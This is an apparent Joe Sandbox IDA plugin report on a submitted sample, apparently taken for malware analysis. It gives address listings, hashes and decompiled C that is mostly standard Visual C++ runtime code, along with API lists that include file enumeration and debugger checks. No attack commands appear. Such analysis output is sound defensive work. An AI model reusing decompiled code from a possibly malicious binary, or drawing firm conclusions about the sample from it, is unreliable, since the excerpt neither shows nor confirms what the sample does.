0x00414c78
0x00000000
0x00000000
0x00414c5d
0x00414c5f
0x00414c81
0x00414c81
0x00414c91
0x00414c91
0x00414c93
0x00000000
0x00000000
0x00414c86
0x00414c88
0x00414be9
0x00414be9
0x00000000
0x00414be9
0x00414c8e
0x00414c90
0x00414c90
0x00414c90
0x00000000
0x00414c95
0x00414c61
0x00414c64
0x00414c67
0x00414c6b
0x00414c71
0x00414c7c
0x00000000
0x00414c7c
0x00414c73
0x00414c75
0x00414c75
0x00414c75
0x00000000
0x00000000
0x00000000
0x00000000
0x00414bfa
0x00414bfe
0x00414c47
0x00414c49
0x00414c4a
0x00414c4a
0x00000000
0x00414c4a
0x00414c00
0x00414c03
0x00414c03
0x00414c06
0x00414c09
0x00414c0c
0x00414bd0
0x00414bd0
0x00414a46
0x00414a46
0x00000000
0x00414a46
0x00414c0e
0x00414c0f
0x00414c0f
0x00414c10
0x00414bc4
0x00414bc4
0x00414bc8
0x00414bca
0x00000000
0x00414bca
0x00414c12
0x00414c14
0x00414c14
0x00414c1b
0x00414c1d
0x00414fc8
0x00414fef
0x00414fef
0x00414ff1
0x00414ff3
0x00414ff5
0x00414ff5
0x00414ff7
0x00414ff7
0x00414ffa
0x00414ffa
0x00414ffd
0x00415000
0x00415004
0x00415007
0x0041500a
0x00000000
0x0041500a
0x00414c23
0x00414c25
0x00414c26
0x00414c29
0x00414c2b
0x00414c2f
0x00414c31
0x00414c31
0x00414c31
0x00414c31
0x00414c34
0x00414c35
0x00414c35
0x00414c35
0x00414c38
0x00414c38
0x00414c3b
0x00414c3f
0x00000000
0x00414c45
0x00414ca0
0x00414ca0
0x00414ca1
0x00414ca4
0x00000000
0x00000000
0x00414c9a
0x00414c9d
0x00414c9d
0x00414c9d
0x00414c9d
0x00414cb1
0x00414cb6
0x00414cbe
0x00414cc1
0x00414cc3
0x00414cc3
0x00414cc5
0x00414cc8
0x00414ccb
0x00414ccd
0x00414ccd
0x00414ccd
0x00414cd0
0x00414cd3
0x00414cd5
0x00414cd5
0x00414cd5
0x00414cd8
0x00414cdd
0x00414fd1
0x00414fd3
0x00414fd8
0x00414fdd
0x00414fdf
0x00000000
0x00414ce3
0x00414ce3
0x00414ce8
0x00414fe8
0x00000000
0x00414fe8
0x00414cf3
0x00414cf6
0x00414cf8
0x00414cfb
0x00414fb6
0x00414fb9
0x00414fbd
0x00414fc0
0x00414fc3
0x00000000
0x00414fc3
0x00414d01
0x00414d0a
0x00414d0d
0x00414d0d
0x00414d0d
0x00414d10
0x00414d13
0x00414d15
0x00414d15
0x00414d19
0x00414d1c
0x00414d22
0x00414d25
0x00414d29
0x00414d2c
0x00414d2f
0x00414d31
0x00414d34
0x00000000
0x00000000
0x00414d3f
0x00414d41
0x00414d46
0x00414d49
0x00414d50
0x00414d51
0x00414d52
0x00414d53
0x00414d53
0x00414d53
0x00414d56
0x00414d59
0x00414d5c
0x00414d5c
0x00414d5f
0x00414d63
0x00414d68
0x00414d6b
0x00414d6e
0x00414d71
0x00414d7d
0x00414d7f
0x00414d81
0x00414d86
0x00414d8e
0x00414d91
0x00414f92
0x00414f95
0x00414f97
0x00414fa0
0x00414fa5
0x00414fa5
0x00414fa5
0x00000000
0x00414d97
0x00414d97
0x00414d9c
0x00000000
0x00000000
0x00414da2
0x00414da7
0x00000000
0x00000000
0x00414dad
0x00414db2
0x00414dc1
0x00414dc4
0x00414de5
0x00414de7
0x00414dea
0x00414e0d
0x00414e0d
0x00414e0d
0x00414e0d
0x00414e10
0x00414e13
0x00414e1a
0x00414e1d
0x00414e20
0x00414e22
0x00414e24
0x00414e27
0x00000000
0x00000000
0x00414e2d
0x00414e2d
0x00414e30
0x00414e33
0x00414e36
0x00414e42
0x00414e46
0x00414e49
0x00414e4c
0x00414e4f
0x00414e51
0x00414e57
0x00414e57
0x00000000
0x00414e57
0x00414e53
0x00414e55
0x00000000
0x00000000
0x00000000
0x00414e5e
0x00414e5e
0x00414e62
0x00414e65
0x00414e67
0x00414e67
0x00414e67
0x00414e6a
0x00414e6e
0x00414e72
0x00414e75
0x00414e75
0x00414e7b
0x00414e7e
0x00414e7f
0x00414e80
0x00414e83
0x00414e86
0x00414e86
0x00414e8c
0x00414e92
0x00414e95
0x00414ed2
0x00414ed2
0x00414ed8
0x00414edb
0x00414f20
0x00414f20
0x00414f26
0x00414f39
0x00414f39
0x00414f3d
0x00414f69
0x00414f69
0x00414f69
0x00414f3f
0x00414f3f
0x00414f43
0x00414f47
0x00414f64
0x00414f49
0x00414f49
0x00414f4d
0x00414f53
0x00414f5e
0x00414f55
0x00414f55
0x00414f5b
0x00414f5b
0x00414f53
0x00414f47
0x00414f6c
0x00414f6c
0x00414f71
0x00414f74
0x00000000
0x00000000
0x00414f7a
0x00414f81
0x00414f89
0x00414f8c
0x00000000
0x00414f8c
0x00414f31
0x00414f37
0x00000000
0x00000000
0x00000000
0x00414f37
0x00414ee1
0x00414ee4
0x00414ee4
0x00414ee6
0x00414ee6
0x00414eea
0x00414eec
0x00414eec
0x00414eec
0x00414eec
0x00414ef8
0x00414f00
0x00414f0c
0x00414f0c
0x00414f0d
0x00414f10
0x00414f10
0x00414f15
0x00414f19
0x00414f1b
0x00414f1b
0x00414f1b
0x00414f1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00414e97
0x00414e97
0x00414e97
0x00414e9e
0x00000000
0x00000000
0x00414ea0
0x00414ea6
0x00414ebc
0x00414ec2
0x00414ec5
0x00414ec8
0x00414ecb
0x00000000
0x00000000
0x00000000
0x00414ecb
0x00414ecd
0x00414ed0
0x00000000
0x00000000
0x00000000
0x00414ed0
0x00414dec
0x00414ded
0x00414df4
0x00000000
0x00000000
0x00414df6
0x00414df9
0x00000000
0x00000000
0x00414dfb
0x00414dfd
0x00000000
0x00000000
0x00414dff
0x00414e02
0x00414e05
0x00000000
0x00414e05
0x00414dc6
0x00414dc7
0x00414dce
0x00000000
0x00000000
0x00414dd0
0x00414dd4
0x00000000
0x00000000
0x00414dd6
0x00414dda
0x00000000
0x00000000
0x00414ddc
0x00000000
0x00414ddc
0x00414db4
0x00414db6
0x00414db9
0x00414fa9
0x00414fa9
0x00414fa9
0x00414fac
0x00414fac
0x00414fac
0x00414d22
0x00000000
0x00414d1c
0x00414cdd
0x00000000
0x00414a1c
0x00414c4b
0x00414c4b
0x00414c4e
0x00000000
0x00000000
0x00000000
0x00414c54
0x00414a0b
0x00414a0b
0x00414a0b
0x004149d4
0x004149d4
0x004149d9
0x004149da
0x004149db
0x004149dc
0x004149dd
0x004149de
0x004149e4
0x004149ec
0x0041500d
0x0041501b
0x0041501b

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 3a3e26d4e0284980631ff1f4d077d6771db4f8c1a99e6c9ea26b0010a9d14bdd
Instruction ID: be2820b812828461db64683cad85a0873d12b28c68765580b26a87767bbd0006
Opcode Fuzzy Hash: 3a3e26d4e0284980631ff1f4d077d6771db4f8c1a99e6c9ea26b0010a9d14bdd
Instruction Fuzzy Hash: 5E227731E442088BDF24CFA8C4503EEBBB2FB99315F65812BD456AB385D77858C6CB49

Function 00402F20, Relevance: .0, Instructions: 19

C-Code - Quality: 68%

			E00402F20(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t14;
				intOrPtr _t18;
				void* _t19;
				void* _t20;

				_push(E00402F74);
				_push( *[fs:0x0]);
				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
				_t19 = _t20 + 0x10;
				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
				_push( *((intOrPtr*)(_t19 - 8)));
				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
				 *((intOrPtr*)(_t19 - 8)) =  *((intOrPtr*)(_t19 - 4));
				_t9 = _t19 - 0x10; // -16
				_t14 = _t9;
				 *[fs:0x0] = _t14;
				return _t14;
			}

0x00402f20
0x00402f2b
0x00402f30
0x00402f34
0x00402f40
0x00402f43
0x00402f47
0x00402f4e
0x00402f51
0x00402f51
0x00402f54
0x00402f5a

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c95a67a94664cdbf0f61c5e2434afc347c4625af5a5a7507b5e1067c153ece
Instruction ID: fd0c152cdb07e373f2f2774d870df907db34f929ce6419e756e40dd329f785f5
Opcode Fuzzy Hash: 37c95a67a94664cdbf0f61c5e2434afc347c4625af5a5a7507b5e1067c153ece
Instruction Fuzzy Hash: 59E0E5B5900789EFCB10CF98C980A9EBBF8FB45650F100A5AF460D3280D3349A048B91

Function 002D3E73, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 217filememorytime

APIs

memset.NTDLL ref: 002D3EDA
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002D3F0C
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002D3F20
CloseHandle.KERNEL32(?), ref: 002D3F37
lstrcat.KERNEL32(?,002DC6A3), ref: 002D3F7D
FindNextFileA.KERNEL32(002DA05C,?), ref: 002D3FC5
StrChrA.SHLWAPI(?,0000002E), ref: 002D4033
memcpy.NTDLL(?,?,00000000), ref: 002D406C
FindNextFileA.KERNEL32(002DA05C,?), ref: 002D4081
CompareFileTime.KERNEL32(?,?), ref: 002D40AA
HeapFree.KERNEL32(00000000,?), ref: 002D40F1
HeapFree.KERNEL32(00000000,?), ref: 002D4101

Strings

Fv, xrefs: 002D3E8A
}nls, xrefs: 002D3EB0
pnls, xrefs: 002D3E84, 002D3E95, 002D3EAB, 002D3EB7, 002D3ECF, 002D3ED7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: File$FindFreeHeapNextTime$CloseCompareCreateHandlelstrcatmemcpymemset
String ID: Fv$pnls$}nls
API String ID: 293928577-1697535189
Opcode ID: b91fa7646e8632be2f07451c6757ad543c5e30d23ee16f7f3b35b34727b96603
Instruction ID: c56f93c7f86f224e8b9a105f5e05d076edb75c7aa4a69dc23ea522616ff87873
Opcode Fuzzy Hash: b91fa7646e8632be2f07451c6757ad543c5e30d23ee16f7f3b35b34727b96603
Instruction Fuzzy Hash: C3814972D1020AEFDB119FA5DC48AEEBBB9FB48301F10416AE605E2250D7719E54CF60

Function 0040ED95, Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 156
file

C-Code - Quality: 65%

			E0040ED95(intOrPtr _a4) {
				long _v4;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* _t9;
				int _t11;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t24;
				void* _t26;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void** _t40;
				void* _t42;
				void* _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t30 = _a4;
				_t38 = 0;
				while(_t30 !=  *((intOrPtr*)(0x42c328 + _t38 * 8))) {
					_t38 = _t38 + 1;
					if(_t38 < 0x17) {
						continue;
					}
					break;
				}
				if(_t38 >= 0x17) {
					return _t9;
				}
				if(E00412544(_t30, _t37, _t38, 3) == 1) {
					L22:
					_t11 = GetStdHandle(0xfffffff4);
					_t45 = _t11;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 0xffffffff;
						if(_t45 != 0xffffffff) {
							_t40 = 0x42c32c + _t38 * 8;
							_t11 = WriteFile(_t45,  *_t40, E0040CCD0( *_t40),  &_v4, 0);
						}
					}
					L25:
					return _t11;
				}
				_t11 = E00412544(_t30, _t37, _t38, 3);
				_pop(_t34);
				if(_t11 != 0 ||  *0x42c050 != 1) {
					if(_t30 == 0xfc) {
						goto L25;
					} else {
						_t14 = E0040D0F8(_t37, 0x436218, 0x314, "Runtime Error!\n\nProgram: ");
						_t49 = _t48 + 0xc;
						_t61 = _t14;
						if(_t14 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0040CA26(0x314, _t34, _t37, _t38, _t61);
							_t49 = _t49 + 0x14;
						}
						 *0x436335 = 0;
						if(GetModuleFileNameA(0, 0x436231, 0x104) == 0) {
							_t26 = E0040D0F8(_t37, 0x436231, 0x2fb, "<program name unknown>");
							_t49 = _t49 + 0xc;
							if(_t26 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0040CA26(0x314, _t34, _t37, _t38, 0);
								_t49 = _t49 + 0x14;
							}
						}
						_t16 = E0040CCD0(0x436231);
						_pop(_t35);
						if(_t16 + 1 <= 0x3c) {
							L16:
							_t42 = 0;
							__eflags = 0;
							goto L17;
						} else {
							_t23 = E0040CCD0(0x436231) + 0x4361f6;
							_t35 = 0x43652c - E0040CCD0(0x436231) + 0x4361f6;
							_t24 = E00412491(_t37, _t23, 0x43652c - E0040CCD0(0x436231) + 0x4361f6, "...", 3);
							_t49 = _t49 + 0x14;
							_t66 = _t24;
							if(_t24 == 0) {
								goto L16;
							}
							_t42 = 0;
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0040CA26(0x314, _t35, _t37, _t38, _t66);
							_t49 = _t49 + 0x14;
							L17:
							_t18 = E00412420(_t37, 0x436218, 0x314, "\n\n");
							_t50 = _t49 + 0xc;
							_t67 = _t18;
							if(_t18 != 0) {
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								E0040CA26(0x314, _t35, _t37, _t38, _t67);
								_t50 = _t50 + 0x14;
							}
							_t19 = E00412420(_t37, 0x436218, 0x314,  *(0x42c32c + _t38 * 8));
							_t51 = _t50 + 0xc;
							_t68 = _t19;
							if(_t19 != 0) {
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								E0040CA26(0x314, _t35, _t37, _t38, _t68);
								_t51 = _t51 + 0x14;
							}
							_t11 = E00412282(_t37, 0x436218, "Microsoft Visual C++ Runtime Library", 0x12010);
							goto L25;
						}
					}
				} else {
					goto L22;
				}
			}

0x0040ed97
0x0040ed9f
0x0040eda1
0x0040edaa
0x0040edae
0x00000000
0x00000000
0x00000000
0x0040edae
0x0040edb3
0x0040ef34
0x0040ef34
0x0040edc5
0x0040eefc
0x0040eefe
0x0040ef04
0x0040ef06
0x0040ef08
0x0040ef0a
0x0040ef0d
0x0040ef16
0x0040ef29
0x0040ef29
0x0040ef0d
0x0040ef2f
0x00000000
0x0040ef2f
0x0040edcd
0x0040edd4
0x0040edd5
0x0040edea
0x00000000
0x0040edf0
0x0040ee01
0x0040ee06
0x0040ee09
0x0040ee0b
0x0040ee0d
0x0040ee0e
0x0040ee0f
0x0040ee10
0x0040ee11
0x0040ee12
0x0040ee17
0x0040ee17
0x0040ee27
0x0040ee36
0x0040ee43
0x0040ee48
0x0040ee4d
0x0040ee51
0x0040ee52
0x0040ee53
0x0040ee54
0x0040ee55
0x0040ee56
0x0040ee5b
0x0040ee5b
0x0040ee4d
0x0040ee5f
0x0040ee68
0x0040ee69
0x0040eea3
0x0040eea3
0x0040eea3
0x00000000
0x0040ee6b
0x0040ee74
0x0040ee82
0x0040ee86
0x0040ee8b
0x0040ee8e
0x0040ee90
0x00000000
0x00000000
0x0040ee92
0x0040ee94
0x0040ee95
0x0040ee96
0x0040ee97
0x0040ee98
0x0040ee99
0x0040ee9e
0x0040eea5
0x0040eeac
0x0040eeb1
0x0040eeb4
0x0040eeb6
0x0040eeb8
0x0040eeb9
0x0040eeba
0x0040eebb
0x0040eebc
0x0040eebd
0x0040eec2
0x0040eec2
0x0040eece
0x0040eed3
0x0040eed6
0x0040eed8
0x0040eeda
0x0040eedb
0x0040eedc
0x0040eedd
0x0040eede
0x0040eedf
0x0040eee4
0x0040eee4
0x0040eef2
0x00000000
0x0040eef7
0x0040ee69
0x00000000
0x00000000
0x00000000

APIs

GetModuleFileNameA.KERNEL32(00000000,00436231,00000104,0040FA78,00000001,00000214), ref: 0040EE2E
_strlen.LIBCMT ref: 0040EE5F
_strlen.LIBCMT ref: 0040EE6C

Part of subcall function 00412282: LoadLibraryA.KERNEL32 ref: 004122AF
Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122CE
Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122E7
Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,00000000,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 004122FC
Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA,?,?,?,00436218,0040EEF7,00436218), ref: 00412331
Part of subcall function 00412282: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation,?,?,?,00436218,0040EEF7,00436218), ref: 00412349

Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06

GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,76ECE046,00000003,0040EF61,000000FC,0040C732,00000001,00000000,00000000,?,004110A6,0040FA78,00000001), ref: 0040EEFE
_strlen.LIBCMT ref: 0040EF1F
WriteFile.KERNEL32 ref: 0040EF29

Strings

..., xrefs: 0040EE7D
,eC, xrefs: 0040EE78
<program name unknown>, xrefs: 0040EE38
1bC, xrefs: 0040EE1F
Microsoft Visual C++ Runtime Library, xrefs: 0040EEEC
Runtime Error!Program: , xrefs: 0040EDF0

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressProc$_strlen$ExceptionFileFilterProcessUnhandled$CurrentDebuggerHandleLibraryLoadModuleNamePresentTerminateWrite
String ID: ,eC$...$1bC$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 4184918118-2450894920
Opcode ID: 7b871b0783c43e04a25583e1c512450dc56a31d9f09b1317cbc8e62b82cf6b72
Instruction ID: 462586cc789323171f2c72c096ec468ac0dd215f58db3d8e5dcc44e6501676fe
Opcode Fuzzy Hash: 7b871b0783c43e04a25583e1c512450dc56a31d9f09b1317cbc8e62b82cf6b72
Instruction Fuzzy Hash: 253137B26442197AE62033279C86BBF364C9B15358F15053BFC08B02D3EA7E996140EE

Function 00412B53, Relevance: 16.8, APIs: 11, Instructions: 339

C-Code - Quality: 86%

			E00412B53(short* __ecx, int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t110 ^ _t188;
				_t194 =  *0x436a04; // 0x1
				_t184 = __ecx;
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x418118, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x436a04 = 2;
						}
					} else {
						 *0x436a04 = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x436a04; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						__eflags = _a4;
						_v16 = 0;
						_v20 = 0;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E004134B0(0, _t179, _t182, _t184, _a4);
						__eflags = _t113 - 0xffffffff;
						_v24 = _t113;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E00410D1A(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E00410D1A(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E004134F7(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							__eflags = _t120;
							_v16 = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							__eflags = _t121;
							_v12 = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040FE20(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									__eflags = _t123;
									_v12 = _t123;
									if(_t123 != 0) {
										_t186 = E004134F7(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E0041083E(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040C70A(0, _t179, _t182, LCMapStringA, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E004136B0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040FE9A(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E0041083E(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												__eflags = _a24;
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E0041083E(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040C70A(0, _t179, _t182, LCMapStringW, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E004136B0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040C70A(0, _t179, _t182, MultiByteToWideChar, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E004136B0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00412b59
0x00412b60
0x00412b67
0x00412b6e
0x00412b70
0x00412b76
0x00412b8b
0x00412b95
0x00412b9b
0x00412b9e
0x00412ba0
0x00412ba0
0x00412b8d
0x00412b8d
0x00412b8d
0x00412b8b
0x00412bad
0x00412bd1
0x00412bd1
0x00412bd9
0x00412d8a
0x00412d8d
0x00412d90
0x00412d93
0x00412d9a
0x00412d9a
0x00412d9d
0x00412da0
0x00412da7
0x00412da7
0x00412dad
0x00412db2
0x00412db6
0x00412db9
0x00412dc2
0x00412dc5
0x00412ebe
0x00412ec0
0x00412ec0
0x00412ec3
0x00412ec5
0x00412ec8
0x00412ecd
0x00412ece
0x00412ed1
0x00412ed3
0x00412ed5
0x00412ed8
0x00412eda
0x00412edb
0x00412ee0
0x00412ed8
0x00412ee1
0x00000000
0x00412ee1
0x00412dd8
0x00412ddd
0x00412de0
0x00412de2
0x00412de5
0x00000000
0x00000000
0x00412df9
0x00412dfb
0x00412dfd
0x00412e00
0x00412e09
0x00412e48
0x00412e48
0x00412e48
0x00412e4a
0x00412e4a
0x00412e4c
0x00000000
0x00000000
0x00412e53
0x00412e6b
0x00412e6d
0x00412e6f
0x00412e72
0x00412e8e
0x00412e90
0x00412e98
0x00412e9a
0x00412e9a
0x00412e74
0x00412e74
0x00412e74
0x00412e9e
0x00000000
0x00412ea3
0x00412e0b
0x00412e0e
0x00000000
0x00000000
0x00412e10
0x00412e13
0x00412e18
0x00412e31
0x00412e36
0x00412e39
0x00412e3b
0x00412e41
0x00412e41
0x00412e41
0x00412e44
0x00000000
0x00412e44
0x00412e1a
0x00412e1f
0x00412e21
0x00412e23
0x00000000
0x00000000
0x00412e25
0x00412e2b
0x00000000
0x00412e2b
0x00412e02
0x00412e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00412be7
0x00412bea
0x00412dbb
0x00412dbb
0x00412ee3
0x00412ef4
0x00412ef4
0x00412bf3
0x00412bf6
0x00412bfd
0x00412bfd
0x00412c00
0x00412c23
